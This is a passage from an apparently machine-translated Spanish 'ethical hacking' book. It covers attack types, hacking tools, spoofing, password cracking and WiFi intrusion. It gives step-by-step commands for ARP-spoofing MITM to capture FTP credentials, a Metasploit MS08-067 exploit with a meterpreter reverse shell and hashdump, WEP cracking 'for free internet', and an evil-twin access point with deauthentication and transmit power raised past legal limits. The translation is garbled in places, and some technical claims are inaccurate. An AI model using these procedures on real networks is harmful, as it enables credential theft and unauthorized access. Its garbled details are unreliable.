intrusiones), que servirá como protección contra escaneos de puertos y su método automatizado de cerrar cualquier intento de
escaneo de puertos antes de que un intruso obtenga un mapa completo de su red. Al mismo tiempo, también puede instalar un buen
firewall que controlará la visibilidad de los puertos de su red.
¿Qué es un ataque activo?

Un ataque activo es un exploit directo en una red objetivo, en la que un hacker tiene como objetivo crear cambios en los datos o crear datos que
se unirán al objetivo para realizar más exploits.

Los ataques activos generalmente se clasifican en los siguientes:

1. Ataque de disfraces

En este ataque, un hacker pretende ser un usuario legítimo de la red para obtener un acceso más profundo o una mejor autorización. Un pirata

informático generalmente hace esto mediante el uso de identificaciones de usuario y contraseñas pirateadas, omitiendo un sistema de autenticación o

explotando fallas de seguridad descubiertas.

Una vez que un pirata informático logra infiltrarse en el sistema con la identidad que pretende tener, puede realizar cambios o
eliminar cualquier software o archivo, e incluso expulsar a los usuarios autorizados de una red. También pueden realizar
modificaciones en la red y la configuración del enrutador, lo que puede permitirles acceder a

2. Sesión de repetición

En este ataque, un pirata informático utiliza una ID de sesión robada para crear una autenticación automática la próxima vez que el objetivo
acceda a un sitio web en particular. Este ataque explota la naturaleza de la web de almacenar formularios, cookies y URL en un navegador.
Una vez que el pirata informático obtiene los datos utilizados por una ID de sesión particular en un sitio web específico, puede proceder a
un ataque de reproducción de sesión, que le permite hacer todo lo que el usuario legítimo de la ID puede hacer.

Dado que los ataques de repetición de sesión no ocurren en tiempo real, este ataque generalmente se descubre una vez que el usuario legítimo
encuentra discrepancias en su cuenta. La mayoría de las veces, las víctimas de un ataque de repetición de sesión solo descubren que sus
cuentas se han visto comprometidas cuando ya ocurrió el robo de identidad.

3. Denegación de servicio (DoS) y denegación de servicio distribuida (DDoS)

Un ataque DoS se define como la denegación de acceso o servicio a un usuario legítimo; puede ver que todos los servicios que se ejecutan en
su computadora se ralentizan o dejan de funcionar repentinamente a medida que los usa. Un ataque DDoS, por otro lado, involucra una mayor
cantidad de sistemas que han sido comprometidos previamente por un hacker para atacar a un objetivo en particular.

Si bien los ataques DoS y DDoS no se usan para destruir el sistema de seguridad de un objetivo o para robar datos, se pueden usar para generar

pérdida de ganancias o para hacer que un sistema informático sea completamente inútil mientras se usa. Por lo general, estos ataques se realizan para

crear una pérdida temporal de conectividad en una red y denegar todos los servicios relacionados. En ciertas ocasiones, estos ataques también pueden

funcionar para destruir ciertos archivos


y programas en una computadora específica.

Un ataque DoS o DDoS es muy similar a tener una conexión lenta a Internet y una computadora lenta al mismo tiempo. Durante
dicho ataque, puede sentir que el rendimiento de su red es inusualmente lento y no puede acceder a ningún sitio web. Al mismo
tiempo, también es relativamente fácil averiguar si está siendo atacado por un ataque; es posible que vea que está recibiendo
demasiado spam u otras señales de tráfico inusual.

Ahora que tiene una idea sobre los tipos de ataques que puede lanzar un hacker, es hora de que aprenda cómo un hacker puede
lanzarlos y prepararse para hacer contramedidas.
Capítulo 5: Herramientas de piratería

Tanto los piratas informáticos éticos como criminales tienen acceso a una gran cantidad de herramientas de piratería que se pueden utilizar para atacar o proteger

un sistema en particular. Estas herramientas se pueden obtener de Internet a través de foros y otros centros en línea dedicados a los piratas informáticos.

Como hacker ético principiante, es muy importante que aprenda las herramientas más utilizadas para detectar posibles vulnerabilidades, realizar pruebas
y administrar hacks reales. Aquí hay 8 de las herramientas más populares utilizadas por los hackers en la actualidad:

1. Angry IP Scanner (ipscan)

Más popularmente llamado como ipscan por hackers experimentados, esta herramienta se utiliza para rastrear computadoras a través de sus

direcciones IP y también para buscar puertos para verificar las puertas de enlace que los llevarán directamente a un sistema informático específico. Esta

herramienta también es utilizada comúnmente por los ingenieros y administradores de sistemas para verificar posibles vulnerabilidades en los sistemas

que están atendiendo.

Esta herramienta es de código abierto y se puede usar en todas las plataformas, y es reconocida por ser una de las herramientas más eficientes para

hackear que está disponible en el mercado.

2. Kali Linux

Lanzada en 2015, esta aplicación es una de las favoritas de los hackers debido a la abundancia de funciones. Este kit de herramientas
centrado en la seguridad le permite ejecutarlo directamente desde un CD o mediante un USB, sin necesidad de ninguna instalación.

Este kit de herramientas contiene la mayoría de las interfaces que necesita para hackear, lo que incluye la creación de redes falsas,
mensajes falsos e incluso descifrar contraseñas WiFi.

3. Caín y Abel

Cain & Abel es uno de los kits de herramientas de piratería más eficientes que funcionan bien contra los sistemas operativos de Microsoft. Esta

herramienta le permite recuperar contraseñas de redes inalámbricas, contraseñas de cuentas de usuario y utilizar algunos métodos de fuerza bruta

cuando se trata de descifrar contraseñas. También puede usarlo para grabar sesiones de conversación VoIP.

4. Burp Suite

Burp Suite es una de las herramientas más esenciales que puede usar cuando desea asignar vulnerabilidades en un sitio web.
Esta herramienta le permite examinar cada cookie que reside en un sitio web y también iniciar conexiones dentro de las
aplicaciones del sitio web.
5. Ettercap

Esta herramienta es eficiente cuando se trata de lanzar ataques man in the middle, que está diseñada para hacer que dos
sistemas diferentes crean que se están comunicando entre sí, pero un hacker está transmitiendo secretamente un mensaje
diferente al otro. Esta herramienta es eficiente para manipular o robar transacciones o transferir datos entre sistemas, o para
espiar una conversación.

6. Juan el Destripador

Este es uno de los mejores crackers de contraseña de fuerza bruta que utilizan el ataque del diccionario. Si bien la mayoría de los piratas
informáticos pueden pensar que las tácticas de fuerza bruta implican demasiado tiempo para descifrar una contraseña, John the Ripper es una
de las herramientas más eficientes a la hora de recuperar contraseñas cifradas.

7. Metasploit

Metaspoit es ampliamente aclamado entre los piratas informáticos porque es una herramienta eficiente cuando se trata de identificar posibles problemas

de seguridad y también para verificar mitigaciones de vulnerabilidades del sistema. También es una de las mejores herramientas de criptografía para

hackers, ya que también es eficiente cuando se trata de enmascarar identidades y ubicaciones de un ataque.

8. Wireshark y aviones-ng

Estas herramientas se usan juntas para detectar conexiones inalámbricas y piratear identificaciones de usuario y contraseñas en una conexión WiFi.

Wireshark sirve como un rastreador de paquetes, y Aircraft-ng sirve como la suite de captura de paquetes que también le permitirá usar una variedad de

otras herramientas para monitorear la seguridad de WiFi.

Ahora que tiene una lista de herramientas que puede usar para practicar piratería y también para descubrir vulnerabilidades en su propio
sistema, ahora puede profundizar en las tácticas de piratería más comunes y descubrir cómo se hacen.
Capítulo 6: Cómo engañar a los objetivos

Un buen hacker es un detective experto; él es capaz de permanecer sin ser detectado al estar bajo el radar de los administradores de red al
pretender ser otra persona. Para que un pirata informático haga esto, utiliza técnicas de suplantación de identidad o disfraces.
Spoofing

La suplantación de identidad, como ya ha leído en un capítulo anterior, se refiere a la técnica de engaño en la que un pirata informático imita o
finge ser otra persona, organización, software o sitio web. Esto viene con la intención de pasar por alto los protocolos de seguridad del
objetivo para obtener acceso a la información que un hacker quiere obtener. Estas son algunas de las técnicas de falsificación más comunes
que usan los hackers:

1. IP Spoofing

Esta técnica se realiza para enmascarar la dirección IP de una computadora que el pirata informático está utilizando para engañar a una red para
que piense que un usuario legítimo se está comunicando con una computadora objetivo. Para hacer esto, un hacker imita otra dirección IP o rango
para cumplir con los criterios de dirección IP establecidos por un administrador de red.

Esta técnica de piratería fraudulenta funciona al encontrar una dirección IP que utiliza un host de confianza. Después de
hacerlo, puede modificar los encabezados de los paquetes para engañar a la red haciéndole creer que proviene de un usuario
autorizado. De esta manera, puede enviar paquetes dañinos a una red específica, sin tener que rastrearlos.

2. Suplantación de DNS

La falsificación de DNS funciona mediante el uso de la dirección IP de un sitio web para enviar a alguien a un sitio web malicioso donde un
pirata informático puede obtener fácilmente información privada o credenciales de usuario. Este ataque de hombre en el medio le permite
comunicarse con un objetivo desprevenido y pensar que ha entrado en un sitio web que buscó, y luego permitir que un pirata informático
reciba libremente los detalles de la cuenta que este usuario ingresará en un sitio web falso .

Para que esto funcione, el hacker debe estar en la misma LAN que el objetivo. Para obtener acceso a esa LAN, un pirata informático puede
simplemente buscar una contraseña débil en una máquina que está conectada a esa red, que incluso se puede hacer de forma remota. Una vez
que esto se realiza con éxito, un pirata informático puede redirigir a los usuarios para que vayan a un sitio web manipulado y supervisen todas
las actividades que realizarán allí.

3. Suplantación de identidad por correo electrónico

La suplantación de identidad por correo electrónico es muy útil cuando se trata de evitar los servicios de seguridad empleados en un servicio de correo

electrónico. Esto significa que cuando se falsifica una dirección de correo electrónico, el servicio de correo electrónico reconocerá cualquier correo enviado

desde una cuenta fraudulenta como legítimo y no se desviará a la bandeja de entrada de correo no deseado. Esta técnica permite que un hacker envíe

correos electrónicos con archivos adjuntos maliciosos a un objetivo particular.

4. Suplantación de números de teléfono

La suplantación de números de teléfono generalmente usa códigos de área falsos o números de teléfono para enmascarar la ubicación o identidad de un

hacker. Esta táctica permite a los piratas informáticos aprovechar con éxito los mensajes de correo de voz de sus objetivos, enviar mensajes de texto

utilizando un número falso o engañar a un objetivo desde donde se realiza una llamada
viene de todas estas tácticas son muy efectivas al sentar las bases para los ataques de ingeniería social.

El daño de los ataques de enmascaramiento o suplantación de identidad radica en el hecho de que la mayoría de los administradores de red no pueden
detectarlos fácilmente. La peor parte es que los administradores de red y los protocolos de seguridad instalados permiten a los usuarios maliciosos
interactuar con otros usuarios a través de la red e incluso manipular, detener o inyectar flujo de datos en el sistema de destino. Debido a que un pirata
informático que puede infiltrarse en la red puede instalarse fácilmente en uno de los hosts o dispositivos manipulados en el sistema, le resulta fácil
realizar ataques de intermediario.
Ataques de hombre en el medio

Un ataque de hombre en el medio se convierte en una acción de seguimiento muy sensata para un pirata informático criminal después de que realiza con éxito un

ataque de suplantación de identidad. Si bien algunos hackers pasivos se contentarían con simplemente poder ver los datos que necesita y evitar la manipulación

mientras escuchan en un host vulnerable, algunos pueden querer realizar un ataque activo justo después de poder realizar con éxito un ataque de suplantación

de identidad.

Un ataque de hombre en el medio se puede realizar cuando un pirata informático realiza una suplantación de ARP, que se realiza mediante el envío de
mensajes falsos de Protocolo de resolución de direcciones, o ARP, a través de la red de área local infiltrada. Cuando se retira con éxito, los mensajes
ARP falsificados permiten que la dirección MAC de los hackers se vincule con éxito a una dirección IP de un usuario legítimo o un servidor completo en
una red de destino. Una vez que el hacker pueda vincular su dirección MAC a una dirección IP legítima, el hacker podrá recibir todos los datos que otros
usuarios de la red envíen a la dirección IP que está utilizando. Como ya tiene acceso a todos los datos que ingresa el usuario pirateado (el propietario de
la dirección IP) y la información que está recibiendo a través de la red, el pirata informático puede optar por hacer lo siguiente durante una sesión de
suplantación de identidad de ARP:

1) Secuestro de sesión: esto permite que el hacker use el ARP falsificado para
robar el ID de sesión de un usuario y luego usar esas credenciales más adelante para obtener acceso a una cuenta.

2) Ataque de denegación de servicio: este ataque puede realizarse cuando el ARP

La suplantación se realiza para vincular varias direcciones IP múltiples a la dirección MAC de un dispositivo de destino. Lo que sucede en
este tipo de ataque es que todos los datos que supuestamente se envían a otras direcciones IP se redirigen a un solo dispositivo, lo que
puede provocar una sobrecarga de datos. Sabrás más sobre los ataques DoS en un capítulo posterior.

3) Ataque de hombre en el medio: el pirata informático finge ser inexistente en


una red y luego interceptar o modificar los mensajes que se envían entre dos o más víctimas.

Así es como un pirata informático puede realizar una falsificación de ARP para realizar un ataque man-in-the-middle usando una herramienta llamada Backtrack,

un kit de herramientas de piratería que es similar a Kali Linux:

Paso 1: Olfatea los datos que necesitas

Esto se puede hacer usando las herramientas Wireshark, dsniff y tcpdump. Al activar estas herramientas, puede ver todo el tráfico al que
puede conectarse a través de redes inalámbricas o cableadas.

Paso 2: use un adaptador inalámbrico y póngalo en modo monitor

Cuando coloque su adaptador inalámbrico o su NIC en modo monitor, podrá recoger todo el tráfico disponible para su
conexión, incluso los que no están destinados a su dirección IP. Si está conectado a redes concentradas, puede recoger
el tráfico que necesita sin ninguna dificultad.
Sin embargo, si planea infiltrarse en un sistema conmutado, es posible que deba optar por una táctica diferente, ya que los conmutadores regulan
el tráfico y garantizan que se envíen paquetes de datos específicos a direcciones MAC o direcciones IP específicas.

Si desea omitir los conmutadores, o al menos saber qué tipos de información se envían a otros usuarios, puede intentar
cambiar las entradas en la tabla CAM que asigna direcciones IP y MAC que se envían información entre sí. Si cambia las
entradas, puede obtener con éxito el tráfico destinado a otra persona. Para hacer esto, debes realizar un ataque ARP
spoofing.

Paso 3: Enciende Backtrack

Una vez que pueda levantar Backtrack, levante tres terminales. Luego, y haga lo siguiente:

1) Reemplace la dirección MAC del cliente al que está apuntando con su


Dirección MAC. Ingrese la siguiente cadena para decirle al cliente que su dirección MAC es el servidor: arpspoof [IP del cliente] [IP del

servidor]

2) Invierta el orden de las direcciones IP en la cadena anterior que


usado. Esto le dirá al servidor que su computadora es el cliente.

3) Ahora que finge ser el servidor y el cliente, usted


ahora deberá poder recibir los paquetes del cliente y luego reenviarlos al servidor, y también al revés.

Si está utilizando Linux, puede hacer uso de su función incorporada llamada ip_forward, que le permite reenviar
los paquetes que recibe. Una vez que lo active, podrá reenviar los paquetes usando ipforwarding ingresando
este comando en Backtrack: echo 1> / proc / sys / net / ipv4 / ip_forward

Una vez que ingrese este comando, su sistema se colocará justo en el medio tanto del cliente como del servidor. Esto
significa que ahora puede recibir y reenviar datos enviados entre el cliente y el servidor.

4) Use Dsniff para verificar el tráfico

Ahora que puede obtener todo el tráfico que se envía desde y hacia el cliente y el servidor, podrá encontrar todo el
tráfico disponible. Para hacer esto, active una herramienta sniffer en Backtrack ingresando el comando "dsniff".
Después de hacerlo, verá que el dsniff está activado y está escuchando el tráfico disponible.

5) Tome las credenciales o los datos que necesita en el ftp


Ahora, todo lo que necesita hacer es esperar a que el cliente inicie sesión directamente en el servidor ftp. Cuando eso suceda, verá
inmediatamente cuál es su nombre de usuario o contraseña.

Dado que tanto los usuarios como los administradores usan las mismas credenciales en todos los servicios o sistemas informáticos, puede
usar las credenciales que puede recibir para iniciar sesión.
Capítulo 7: Hackear contraseñas

Las contraseñas se encuentran entre los objetivos más comunes de los piratas informáticos simplemente porque el pirateo de contraseñas es uno de los trucos más

fáciles de realizar. Si bien la mayoría de las personas piensan que crear frases de contraseña más largas es difícil de descifrar, los hackers son conscientes de que la

mayoría de las personas generalmente descuidan proteger sus credenciales de usuario.

La información confidencial de inicio de sesión, como las contraseñas, se encuentran entre los enlaces más débiles en la seguridad tecnológica porque es esa

característica de seguridad que solo se basa en el secreto. Una vez que este secreto se filtra, toda la responsabilidad se pierde y los sistemas se ven fácilmente

comprometidos.

Si ingresas directamente en la mente de un atacante, te darás cuenta de que hay muchas maneras de saber cuál es la contraseña de un usuario
porque tiene demasiada vulnerabilidad. El mayor problema de confiar simplemente en las contraseñas para la seguridad es que la mayoría de las
veces, un usuario proporciona su información de usuario a otros usuarios también. Si bien un usuario puede revelar su contraseña de manera
intencional o no, una vez que este código secreto está fuera, no hay forma de que sepa quién más sabe qué es. En este punto, es importante saber
que cuando alguien sabe cuál es la contraseña de un usuario, no convierte a esa persona en un usuario autorizado en una red.
Cómo descifrar contraseñas

Si no es posible que un pirata informático conozca la contraseña de un usuario a través de inferencia, ingeniería social y ataque físico (que se
analizará en detalle en capítulos posteriores), puede utilizar varias herramientas para descifrar contraseñas, como las siguientes:

1. Cain & Abel: se utiliza para descifrar hashes LanManager NT y LM (NTLM), hashes Pic y Cisco IOS, hashes Radius y
contraseñas RDP de Windows.

2. Recuperación de contraseña distribuida de Elmcomsoft: descifra las contraseñas PKCS, Microsoft Office y PGP. También se
puede usar para descifrar contraseñas distribuidas y recuperar 10,000 computadoras en red. También utiliza el acelerador
de GPU que puede aumentar su velocidad de craqueo hasta 50 veces.

3. Elcomsoft System Recovery: restablece las contraseñas de Windows, restablece todos los vencimientos de las contraseñas y establece las credenciales

administrativas.

4. John the Ripper: descifra las contraseñas hash de Windows, Unix y Linux

5. Ophcrack: utiliza tablas de arcoíris para descifrar contraseñas de Windows

6. Pandora: descifra las contraseñas de usuario fuera de línea o en línea para las cuentas de Novell Netware

7. Recuperación proactiva de la contraseña del sistema: recupera cualquier contraseña almacenada localmente en un sistema operativo Windows.

Esto incluye contraseñas para inicios de sesión, VPN, RAS, SYSKEY e incluso conexiones WEP o WPA.

8. RainbowCrack: descifra los hash MD5 y LanManager usando la tabla de arcoiris.

Tenga en cuenta que algunas de estas herramientas pueden requerir tener acceso físico al sistema que desea piratear. Del mismo modo, tenga en
cuenta que una vez que un hacker tiene acceso físico a un sistema que tiene la intención de proteger, podrá indagar en todos los archivos cifrados o
protegidos por contraseña que tenga, siempre que tenga las herramientas adecuadas .

Al probar tácticas para descifrar contraseñas, una de las cosas más importantes que debe recordar es que la técnica que debe
probar se basará en el tipo de cifrado de la contraseña que necesita descifrar. Además, si está probando hacks para descifrar
contraseñas, es posible que también deba recordar que es posible que ciertos sistemas bloqueen a los usuarios asociados, lo que
puede causar la denegación de servicio a los usuarios que utilizan la red.
Notas sobre el cifrado de contraseña

Las contraseñas, después de su creación, se cifran utilizando un algoritmo hash unidireccional. Estas contraseñas hash se ven como
cadenas cifradas. Por las razones obvias, los hashes creados no son reversibles, lo que hace que las contraseñas sean imposibles de
descifrar. Si está intentando descifrar contraseñas en un sistema operativo Linux, hay un mayor grado de dificultad para hacerlo debido al
grado adicional de aleatoriedad en las contraseñas porque este sistema operativo agrega "sal" o un valor aleatorio para hacer que las
contraseñas sean más únicas y evitar que dos usuarios adquieran el mismo valor hash.

Sin embargo, si tiene las herramientas adecuadas, puede lanzar diferentes tipos de ataques para intentar recuperar o descifrar una contraseña. Éstos son
algunos de ellos:

1. Ataques de diccionario

Como su nombre lo indica, estos ataques utilizan palabras disponibles en el diccionario contra la base de datos de contraseñas del
sistema. Este tipo de ataque hace que sea fácil para usted descubrir contraseñas débiles o contraseñas que utilizan ortografías
alternativas, como la palabra pa $$ para reemplazar "contraseña". La fuerza de una herramienta de ataque de diccionario se basa en
la cantidad de palabras de vocabulario que contiene.

2. Ataques de fuerza bruta

Estos ataques son capaces de descifrar cualquier tipo de contraseña, ya que utiliza todas las combinaciones de letras, caracteres
especiales y números hasta que la contraseña de un dispositivo se descifra con éxito. Sin embargo, es fácil adivinar la falla en esta
técnica: puede llevar mucho tiempo descubrir una contraseña, especialmente las más seguras.

3. Ataques arcoiris

Los ataques de arco iris son excelentes para descifrar contraseñas hash, y este tipo de ataque puede generar mayores tasas de éxito. Las herramientas

que hacen uso de ataques de arco iris también pueden descifrar contraseñas más rápido, en comparación con las herramientas de diccionario y de

ataque de fuerza bruta. El único defecto de este tipo de ataque es que solo puede descubrir contraseñas que tengan 14 caracteres o menos.
Otras formas de descubrir contraseñas

Como se mencionó anteriormente, la forma más fácil de descifrar una contraseña es tener acceso físico al sistema que está intentando
piratear. Si no puede utilizar herramientas de craqueo en un sistema, puede utilizar las siguientes técnicas:

1. Registro de pulsaciones de teclas

Esta es fácilmente una de las técnicas más eficientes en el descifrado de contraseñas, ya que utiliza un dispositivo de grabación
que captura las pulsaciones de teclas mientras se escriben en un teclado. Puede utilizar un software de registro de teclado, como
KeyLogger Stealth y Spector Pro, o un hardware de registro de teclas como KeyGhost.

2. Búsqueda de almacenamientos de contraseñas débiles

Hay demasiadas aplicaciones en la mayoría de las computadoras que almacenan contraseñas localmente, lo que las hace muy vulnerables a la
piratería. Una vez que tenga acceso físico a una computadora, puede encontrar fácilmente las contraseñas simplemente buscando
vulnerabilidades de almacenamiento o utilizando búsquedas de texto. Si tiene la suerte, incluso puede encontrar contraseñas almacenadas en la
propia aplicación.

3. Contraseñas de BIOS débiles

Muchas computadoras permiten a los usuarios hacer uso de contraseñas para proteger las configuraciones de hardware que se encuentran
en sus chips CMOS. Sin embargo, puede restablecer fácilmente estas contraseñas simplemente cambiando un solo puente en la placa base
o desconectando la batería CMOS de la placa. También puede probar suerte y buscar en línea las credenciales de inicio de sesión de usuario
predeterminadas para diferentes tipos de placas base en línea.

4. Toma contraseñas de forma remota

Si el acceso físico al sistema o su ubicación es imposible, aún puede obtener contraseñas almacenadas localmente en un sistema que se ejecuta
en un sistema operativo Windows desde una ubicación remota e incluso obtener las credenciales de la cuenta de administrador del sistema. Puede
hacer esto haciendo primero un ataque de suplantación de identidad y luego explotando el archivo SAM en el archivo de registro de la
computadora de destino siguiendo estos pasos:

1. Tire Metasploit y tipo el siguiendo comando: msf > uso

explotar / windows / smb / ms08_067_netapi

2. Luego, ingrese el siguiente comando: msf (ms08_067_netapi)> establecer carga útil


/ windows / meterpreter / reverse_tcp

Después de hacerlo, Metaploit le mostrará que necesita tener la dirección IP del objetivo
(RHOST) y la dirección IP del dispositivo que está utilizando (LHOST). Si ya tiene esos detalles, puede usar
los siguientes comandos para configurar las direcciones IP para el exploit:

msf (ms08_067_netapi)> establecer RHOST [dirección IP de destino] msf

(ms08_067_netapi)> establecer LHOST [su dirección IP]

3. Ahora, explota escribiendo el siguiente comando: msf

(ms08_067_netapi)> exploit

Esto le dará un aviso de terminal que le permitirá acceder a la computadora del objetivo de forma remota.

4. Tome el hash de contraseña

Dado que la mayoría de los sistemas operativos y aplicaciones tienden a almacenar contraseñas en hash para fines de

cifrado, es posible que no pueda ver las credenciales de usuario que está buscando de inmediato. Sin embargo, puede

obtener estos hashes e interpretarlos más tarde. Para obtener los hashes, use este comando: meterpreter> hashdump

Después de ingresar esto, verá todos los usuarios en el sistema que está pirateando y las contraseñas hash. Luego puede
intentar descifrar estos hash utilizando herramientas como Cain & Abel.
Capítulo 8: Hackear conexiones de red

El arte de hackear conexiones de red es fácilmente una de las hazañas favoritas de un hacker. Al piratear las conexiones a Internet, un
hacker puede ocultar fácilmente su identidad, disfrutar de ancho de banda gratuito para descargas masivas y utilizar otra conexión para
actividades ilegales. También le permite a un hacker descifrar el tráfico del usuario y capturarlo. Solo puede imaginar lo que un pirata
informático criminal es capaz de hacer una vez que obtiene su conexión Wi-Fi y el problema en el que podría encontrarse cuando eso
suceda.

Antes de intentar probar hacks en las conexiones a Internet, es importante que entienda los niveles de privacidad cuando se trata de
proteger su conexión inalámbrica. El nivel de ataque que debe probar dependerá en gran medida del nivel de seguridad de una conexión a
Internet específica. Estos son algunos de los protocolos de seguridad más básicos en conexiones inalámbricas:

1. WEP (Privacidad equivalente por cable)

Como su nombre lo indica, este nivel de cifrado está diseñado para proporcionar privacidad a los usuarios para una conexión por cable. Sin
embargo, esto es increíblemente fácil de descifrar debido a su pequeño vector de inicialización que puede capturarse fácilmente en el flujo de
datos. Este tipo de cifrado generalmente está disponible en conexiones inalámbricas antiguas y dispositivos que aún no se han actualizado para
acomodar mejores protocolos de seguridad de Internet.

2. WPA (WPA1)

Este protocolo de seguridad se creó para abordar las debilidades presentes en el cifrado WEP y utiliza el Protocolo de
integridad de clave temporal (TKIP) para realizar mejoras en la seguridad WEP sin requerir que los usuarios instalen
nuevo hardware. Esto significa que esta tecnología todavía utiliza la seguridad WEP, pero atacarla es más difícil.

3. WPA2-PSK

Esto suele ser utilizado por pequeñas empresas y usuarios domésticos y hace uso de una clave precompartida o PSK. Si bien este protocolo
es mucho más seguro que los dos anteriores, sigue siendo vulnerable a algunas tácticas de piratería.

4. WPA2-AES

Esta es la versión empresarial del protocolo WPA, que utiliza el Estándar de cifrado avanzado (AES) para cifrar datos.
Cuando vea que una organización usa este tipo de seguridad, también puede esperar que venga con un servidor RADIUS
para autenticación adicional. Este protocolo puede ser muy difícil de eludir, pero aún es posible descifrarlo.
Hackear una conexión WEP

Aquí, descubrirá cómo se puede hackear fácilmente una conexión con bajo nivel de seguridad. Para intentar este hack, necesitará un adaptador
inalámbrico, aircrack-ng y BackTrack. Una vez que tenga esas herramientas, siga estos pasos:

1. Cargue el aircrack-ng en Backtrack

Una vez que inicie Backtrack, conecte su adaptador inalámbrico y vea si está funcionando. Para hacer eso, ingrese el comando: Iwconfig

Después de hacerlo, podrá ver si se reconoce su adaptador. Puede ver eso como wlan0, wlan1, etc.

2. Coloque el adaptador inalámbrico en modo promiscuo

Ahora, busque las conexiones disponibles cerca colocando su adaptador inalámbrico en modo monitor o en modo promiscuo.

Para hacer eso, ingrese el siguiente comando: airmon-ng start wlan0

Después de hacerlo, airmon-ng cambiará el nombre de su interfaz a mon0. Una vez que pueda colocar su adaptador
inalámbrico en modo monitor, podrá capturar el tráfico disponible ingresando el siguiente comando: airodump-ng
mon0

Ahora, podrá ver todos los puntos de acceso y sus clientes correspondientes que están dentro de su alcance.

3. Comience a capturar en un punto de acceso particular

Si ve un BSSID o un ESSID que tiene un cifrado WEP, ya tiene la idea de que esa será la conexión más fácil de
descifrar en la lista de AP que pudo capturar. Ahora, copie el BSSID del AP elegido y comience a capturar usando
este comando:

airodump-ng --bssid [BSSID del objetivo] -c [número de canal] -w WEPcrack mon0 Después de ingresar el comando, Backtrack

comenzará a capturar paquetes del punto de acceso objetivo en su canal particular y luego escribirá el WEPcrack en el formato de pcap

. Esto le permitirá obtener todos los paquetes que necesita para decodificar la clave de acceso utilizada en la conexión que desea

aprovechar. Sin embargo, obtener suficientes paquetes para el descifrado puede llevar mucho tiempo. Si no puedes esperar a
obtener suficientes paquetes, puede inyectar tráfico ARP en su lugar.

4. Inyectar tráfico ARP

Si no tiene la paciencia para obtener suficientes paquetes para la captura de WEPkey, puede capturar un paquete ARP
y luego reproducirlo varias veces para obtener todos los IV que necesita para descifrar la WEPkey. Como ya tiene el
BSSID y la dirección MAC del objetivo (ambos se pueden recopilar en el Paso 3), ingrese el siguiente comando:
aireplay-ng -3 -b [BSSID] -h [dirección MAC] mon0

Ahora, puede inyectar los ARP capturados directamente en el punto de acceso objetivo. Todo lo que necesita hacer ahora es capturar
los IV que se generarán directamente en el airodump.

5. Rompe la llave WEP

Una vez que pueda tener suficientes IVs en el archivo WEPcrack, podrá ejecutar el archivo en aircrack-ng ingresando el

siguiente comando: aircrack-ng [nombre del archivo, ecample: WEPcrack-01.cap]

El aircrack-ng generalmente ingresará la clave de acceso en su pantalla en un formato hexadecimal. Todo lo que necesita hacer es aplicar esa
clave en el punto de acceso remoto para disfrutar de su Internet gratis.
The Evil Twin Hack

Si bien muchos piratas informáticos principiantes están entusiasmados de hackear contraseñas de Wi-Fi para disfrutar de ancho de banda gratuito, hay hacks de

conexión de red que son más potentes y proporcionan un mejor acceso que una conexión gratuita a Internet. Entre estos hacks está el malvado punto de acceso

de gemelos.

El malvado AP gemelo es un punto de acceso manipulador que aparece y se comporta como un punto de acceso habitual al que se conecta un usuario para

conectarse a Internet. Sin embargo, los piratas informáticos lo utilizan generalmente para hacer que las víctimas específicas lleguen a su punto de acceso. Esto

permite que un hacker vea todo el tráfico que proviene del cliente, lo que da paso a un ataque de hombre en el medio muy peligroso. Siga los pasos para realizar

un ataque de punto de acceso gemelo malvado:

1. Encienda Backtrack y comience airmon-ng.

Verifique si la tarjeta inalámbrica se está ejecutando ingresando el comando: bt> iwconfig

2. Ponga la tarjeta inalámbrica en modo monitor

Una vez que vea que Backtrack reconoce la tarjeta inalámbrica, colóquela en el monitor o en modo promiscuo ingresando el

comando: bt> airmon-ng start wlan0

3) Arranca airdump-ng

Comience a capturar todo el tráfico inalámbrico que la tarjeta inalámbrica puede detectar ingresando el comando: bt> airodump-ng mon0

Después de hacer eso, podrá ver todos los puntos de acceso dentro del alcance. Localiza el punto de acceso de tu objetivo

4) Espera a que el objetivo se conecte

Una vez que el objetivo se conecta al punto de acceso, copie el BSSID y la dirección MAC del sistema que desea piratear.

5) Crea un punto de acceso con el mismo


cartas credenciales

Abra una nueva terminal y escriba este comando:

bt> airbase-ng -a [BSSID] --essid ["SSID del objetivo"] -c [número de canal] mon0 Esto creará el punto de acceso, o el

gemelo malvado, al que desea que se conecte su objetivo.

6) Desauthenticar el objetivo
Para que él se conecte al punto de acceso gemelo malvado, debe sacar al objetivo del punto de acceso al que está conectado. Como
la mayoría de las conexiones inalámbricas se adhieren al 802.11 que tiene un protocolo de autenticación, su punto de acceso
eliminará la autenticación de todos los que estén conectados a él. Cuando la computadora del objetivo intenta volver a conectarse a
Internet, se conectará automáticamente al AP con la señal más fuerte, que es el punto de acceso gemelo malvado que acaba de
crear.

Para hacerlo, debe utilizar el siguiente comando: bt> aireplay-ng --deauth 0 -a

[BSSID del objetivo]

7) Sube la señal del gemelo malvado

Ahora, aquí está la parte crucial: debe asegurarse de que la señal del punto de acceso falso que acaba de crear sea tan
fuerte o más fuerte que el punto de acceso original. Como está atacando desde la distancia, casi puede deducir que su
propia conexión WiFi tiene una señal mucho más fuerte que la suya. Sin embargo, puede usar el siguiente comando para
subir la señal: iwconfig wlan0 txpower 27

Ingresar este comando aumentará la potencia de su punto de acceso en 500 milivatios, o 27 dBm. Sin embargo, tenga en cuenta que,
dependiendo de su distancia del objetivo, 500 milivatios pueden no ser suficientes para que él se mantenga conectado con el gemelo malvado.
Sin embargo, si tiene una tarjeta inalámbrica más nueva, puede aumentar la señal del punto de acceso hasta 2000 milivatios, o cuatro veces más
de lo que es legal en los EE. UU.

8) Cambia tu canal

Este paso viene con una advertencia: es ilegal cambiar de canal en los EE. UU. Y antes de continuar, asegúrese de tener un
permiso especial como hacker ético.

Hay ciertos países que permiten una mejor potencia de Wi-Fi, lo que puede ayudarlo a mantener la intensidad de la señal de su punto
de acceso gemelo malvado. Por ejemplo, Bolivia permite a sus usuarios de Internet acceder al canal Wi-Fi 12, que viene con una
potencia total de 1000 milivatios. Para cambiar el canal de señal de su tarjeta inalámbrica para que coincida con el de Bolivia, ingrese el
siguiente comando:

iw reg set BO

Dado que su canal ahora le permitirá aumentar la potencia de su punto de acceso, puede aumentar aún más la señal de su

gemelo malvado ingresando el comando: iwconfig wlan0 txpower 30

Ahora, verifique el poder del punto de acceso del gemelo malvado escribiendo iwconfig.
9) Aprovecha al máximo al gemelo malvado

Ahora que ha establecido completamente el AP gemelo malvado y se ha asegurado de que su objetivo esté conectado a él, puede seguir los
siguientes pasos para detectar actividades en su sistema.

Si tiene la herramienta Ettercap, puede realizar fácilmente un ataque de hombre en el medio para analizar los datos que envía o
